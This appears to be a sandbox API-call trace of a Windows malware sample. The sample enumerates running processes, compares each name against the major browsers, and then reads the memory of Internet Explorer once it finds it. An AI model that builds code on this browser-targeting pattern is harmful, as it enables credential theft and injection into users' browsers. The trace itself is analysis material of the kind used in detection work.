	[0235.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.482] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.483] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0235.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7634
	[0235.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.484] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.485] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.485] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.485] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0235.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7638
	[0235.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.487] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0235.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.487] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.487] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0235.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.487] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x763c
	[0235.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.489] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.489] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.489] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0235.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7640
	[0235.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.490] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0235.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.491] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.491] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0235.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.491] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0235.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7644
	[0235.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.493] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0235.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.493] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.493] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0235.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.493] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0235.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7648
	[0235.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.495] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0235.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.495] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.495] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0235.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.495] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0235.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x764c
	[0235.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.496] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0235.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.497] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.497] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0235.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.497] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0235.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0235.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0235.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7650
	[0235.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.500] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0235.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.501] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.501] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0235.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.502] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0235.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7654
	[0235.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.503] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0235.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.503] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.504] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0235.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.504] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0235.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7658
	[0235.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.505] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0235.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.505] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.506] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0235.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.506] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0235.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x765c
	[0235.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.507] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0235.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.507] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.508] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0235.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.508] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0235.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7660
	[0235.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.509] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0235.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.510] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.510] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0235.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.511] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0235.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7664
	[0235.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.512] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0235.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.512] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.513] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0235.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.513] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0235.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7668
	[0235.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.515] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0235.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.516] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.516] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0235.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.516] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.517] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0235.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x766c
	[0235.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.518] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0235.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.518] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.518] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0235.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.519] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0235.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7670
	[0235.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.520] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0235.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.520] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.521] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0235.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.521] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0235.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7674
	[0235.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.522] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0235.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.522] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.523] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0235.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.523] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0235.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7678
	[0235.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.524] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0235.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.524] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.525] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0235.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.525] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0235.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x767c
	[0235.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.527] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0235.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.527] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.528] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0235.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.528] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0235.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7680
	[0235.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.531] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0235.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.531] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.532] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0235.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.532] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0235.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7684
	[0235.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.533] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0235.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.534] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.535] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0235.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.535] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0235.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7688
	[0235.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.537] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0235.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.537] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.538] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0235.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.538] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0235.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x768c
	[0235.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.539] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0235.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.539] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0235.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.540] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0235.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.540] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.540] NtQueryInformationProcess (in: ProcessHandle=0x768c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0235.540] ReadProcessMemory (in: hProcess=0x768c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0235.540] ReadProcessMemory (in: hProcess=0x768c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
